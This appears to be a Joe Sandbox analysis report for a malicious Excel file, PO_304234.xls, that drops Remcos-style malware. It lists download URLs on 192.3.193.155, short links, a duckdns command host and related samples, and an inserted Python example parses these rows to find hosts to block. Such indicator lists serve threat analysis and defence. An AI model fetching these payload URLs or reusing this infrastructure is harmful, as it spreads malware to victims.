http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta6 | mshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/9VEB | mshta.exe, 00000004.00000003.406238458.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://zhort.de/inG | mshta.exe, 00000004.00000003.406942451.0000000000593000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407320806.0000000000593000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.423275187.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.459682593.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.436681548.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.488464745.0000000002475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000024E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta:KWWS | mshta.exe, 00000011.00000002.458485189.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.cr | powershell.exe, 00000007.00000002.430127425.000000001A6FD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIFp | powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://zhort.de/pitash;f | mshta.exe, 00000011.00000002.456621218.000000000039E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htahttp://192.3.193.155/xampp/boz/bz/IEnetwor | mshta.exe, 00000004.00000003.407059010.0000000003055000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.451499028.0000000003175000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.454477370.0000000003175000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://zhort.de//r | mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaC: | mshta.exe, 00000011.00000003.454822112.0000000000444000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.456910082.0000000000444000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaFC: | mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://zhort.de/E3 | mshta.exe, 00000004.00000003.406942451.0000000000593000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407320806.0000000000593000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://zhort.de/t | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpjf | RegAsm.exe, 0000000F.00000002.842261724.000000000066C000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://zhort.de/pitashta | mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htac | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htak | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htac;EB | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/xampp/boz/w | powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e089$ | powershell.exe, 00000007.00000002.430127425.000000001A765000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://zhort.de/pitashzWEB | mshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://zhort.de/pitashvWEB | mshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/ | mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e089 | powershell.exe, 00000014.00000002.472157211.000000001ADDB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://secure.comodo.com/CPS0 | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.454968289.000000001A920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001ACFA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://zhort.de/ | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.454822112.0000000000444000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.456910082.0000000000444000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Legend of the contacted-IP chart (graphic not reproduced): No. of IPs < 25% / 25% < No. of IPs < 50% / 50% < No. of IPs < 75% / 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
192.3.64.135 | cloudsave.duckdns.org | United States | 36352 | AS-COLOCROSSINGUS | true
207.241.232.154 | ia803104.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
88.99.66.38 | zhort.de | Germany | 24940 | HETZNER-ASDE | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
192.3.193.155 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
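The URL rows above come out of the report with the URL, the source process plus memory-dump identifier, and the Malicious flag run together, and the contacted-IP table flags 192.3.193.155 as malicious while every URL row on that host reads Malicious=false with an "Avira URL Cloud: safe" verdict. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses the fused rows, recovers the host from each URL, and reconciles the row with the contacted-IP table so that hosts a URL-reputation lookup alone would wave through are surfaced. The four sample rows and the host table are copied from this page; the set of process names the parser anchors on is an assumption drawn from this report's process list.

```python
import re
from urllib.parse import urlsplit

# Constructed input: four entries copied verbatim from this report's URL table
# in the flattened form the page renders (URL, source, Malicious flag fused).
SAMPLE = """\
https://zhort.de/pitash4mshta.exe, 00000004.00000002.407298326.000000000053A000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaq;EBmshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
https://ia803104.us.archive.org/27/items/vbs_20240powershell.exe, 0000000C.00000002.459682593.0000000002753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.488464745.0000000002785000.00000004.00000800.00020000.00000000.sdmptrue
• 1%, Virustotal, Browse
• Avira URL Cloud: safe
unknown
http://geoplugin.net/json.gpSfRegAsm.exe, 0000000F.00000002.842261724.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
"""

# Contacted-IP table from the same report: host -> sandbox "Malicious" flag.
CONTACTED = {
    "192.3.64.135": True, "cloudsave.duckdns.org": True,
    "207.241.232.154": True, "ia803104.us.archive.org": True,
    "88.99.66.38": False, "zhort.de": False,
    "178.237.33.50": False, "geoplugin.net": False,
    "192.3.193.155": True,
}

# Assumption: the source column always starts with one of the process names
# seen in this report. Anchoring on that fixed set keeps junk bytes such as
# "EB" attached to the URL instead of being read as part of a process name.
PROC = r"(?:mshta|powershell|RegAsm|wscript|EXCEL)\.exe"
ROW_RE = re.compile(
    r"^(?P<url>.+?)"
    rf"(?P<sources>{PROC}, [0-9A-F.]+\.sdmp(?:, {PROC}, [0-9A-F.]+\.sdmp)*)"
    r"(?P<malicious>true|false)$"
)


def parse_report(text):
    """Turn the flattened URL table into one record per URL."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        m = ROW_RE.match(line)
        if m:
            url = m.group("url")
            procs = []
            for proc in re.findall(PROC, m.group("sources")):
                if proc not in procs:          # de-duplicate, keep order
                    procs.append(proc)
            records.append({
                "url": url,
                "host": urlsplit(url).hostname or "",
                "processes": procs,
                "malicious": m.group("malicious") == "true",
                "detections": [],
                "reputation": None,
            })
        elif records and line.startswith("•"):   # scanner verdict bullets
            records[-1]["detections"].append(line.lstrip("• ").strip())
        elif records and line:                    # bare line = reputation
            records[-1]["reputation"] = line
    return records


def escalations(records, contacted):
    """Hosts the contacted-IP table flags malicious although the URL row
    itself carries Malicious=false (the scanner verdict alone said safe)."""
    hosts = []
    for r in records:
        if not r["malicious"] and contacted.get(r["host"]) and r["host"] not in hosts:
            hosts.append(r["host"])
    return hosts


def block_candidates(records, contacted):
    """Hosts flagged malicious by either the URL row or the contacted-IP table."""
    return sorted({r["host"] for r in records
                   if r["malicious"] or contacted.get(r["host"], False)})


if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for r in recs:
        print(f"{r['host']:26} row={str(r['malicious']):5} "
              f"contacted={str(CONTACTED.get(r['host'])):5} {r['processes']}")
    print("escalate:", escalations(recs, CONTACTED))
    print("block:", block_candidates(recs, CONTACTED))
```

Trailing junk that lands in the path (pitash4, json.gpSf) is harmless for host extraction; junk that lands in the host itself (ocsp.entrust.net03 on this page) yields a host the table does not know and has to be reviewed by hand, which is why the example never trims hosts heuristically.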
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1500265
Start date and time: 2024-08-28 06:55:14 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO_304234.xls
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLS@35/38@7/5
EGA Information:
• Successful, ratio: 60%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 45
• Number of non-executed functions: 207
Cookbook Comments:
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Active ActiveX Object
• Scroll down
• Close Viewer
• Override analysis time to 68778.6749910307 for current running targets taking high CPU consumption
• Override analysis time to 137557.349982061 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target mshta.exe, PID 1960 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 3776 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:56:27 | API Interceptor | 81x Sleep call for process: mshta.exe modified
00:56:30 | API Interceptor | 396x Sleep call for process: powershell.exe modified
00:56:38 | API Interceptor | 22x Sleep call for process: wscript.exe modified
00:56:44 | API Interceptor | 4220562x Sleep call for process: RegAsm.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  192.3.64.135Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 192.3.64.135/okeydookietrational.txt
                  Confirmaciones de datos bancarios.xlsxGet hashmaliciousUnknownBrowse
                  • 192.3.64.135/euros2024.jpeg
                  207.241.232.154RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                        another.rtfGet hashmaliciousRemcosBrowse
                          Faktura.vbsGet hashmaliciousRemcosBrowse
                            M12_20240821.xlsGet hashmaliciousRemcosBrowse
                              PO_20931.xlsGet hashmaliciousRemcosBrowse
                                PO082724.xlsGet hashmaliciousRemcosBrowse
                                  PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                    RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                      88.99.66.38RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                        M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                          PO_20931.xlsGet hashmaliciousRemcosBrowse
                                            350.xlsGet hashmaliciousFormBookBrowse
                                              PO082724.xlsGet hashmaliciousRemcosBrowse
                                                SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                                  SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                    RFQ_0826024.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      178.237.33.50RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      rnr.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      thrylPXnvfySmGN.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      PRICE REQUEST RSM PQ24.docx.docGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
cloudsave.duckdns.org | PO_20931.xls | Get hash | malicious | Remcos | Browse | 192.3.64.135
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.8799.4691.rtf | Get hash | malicious | Remcos | Browse | 192.3.64.135
 | X-2901-24.xls | Get hash | malicious | Remcos | Browse | 192.3.64.135
zhort.de | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | PO_20931.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | 350.xls | Get hash | malicious | FormBook | Browse | 88.99.66.38
 | PO082724.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx | Get hash | malicious | Unknown | Browse | 88.99.66.38
 | SWIFT COPY.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
 | RFQ_0826024.xla.xlsx | Get hash | malicious | Remcos | Browse | 88.99.66.38
ia803104.us.archive.org | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | another.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | Faktura.vbs | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | PO_20931.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | PO082724.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | PA-INV0230824 AUG.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
geoplugin.net | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | another.rtf | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | rnr.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | thrylPXnvfySmGN.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | PRICE REQUEST RSM PQ24.docx.doc | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | Faktura.vbs | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AS-COLOCROSSINGUS | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 107.172.31.21
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 107.172.31.21
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 198.46.178.181
 | another.rtf | Get hash | malicious | Remcos | Browse | 198.46.178.137
 | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 192.210.214.138
 | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 192.210.214.138
 | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 192.210.214.138
 | PO_20931.xls | Get hash | malicious | Remcos | Browse | 192.3.64.135
 | PO082724.xls | Get hash | malicious | Remcos | Browse | 198.46.178.137
 | Inv 30532.xls | Get hash | malicious | Remcos | Browse | 198.12.81.225
INTERNET-ARCHIVEUS | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | another.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | Faktura.vbs | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | PO_20931.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | PO082724.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | PA-INV0230824 AUG.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
 | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
ATOM86-ASATOM86NL | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 178.237.33.50
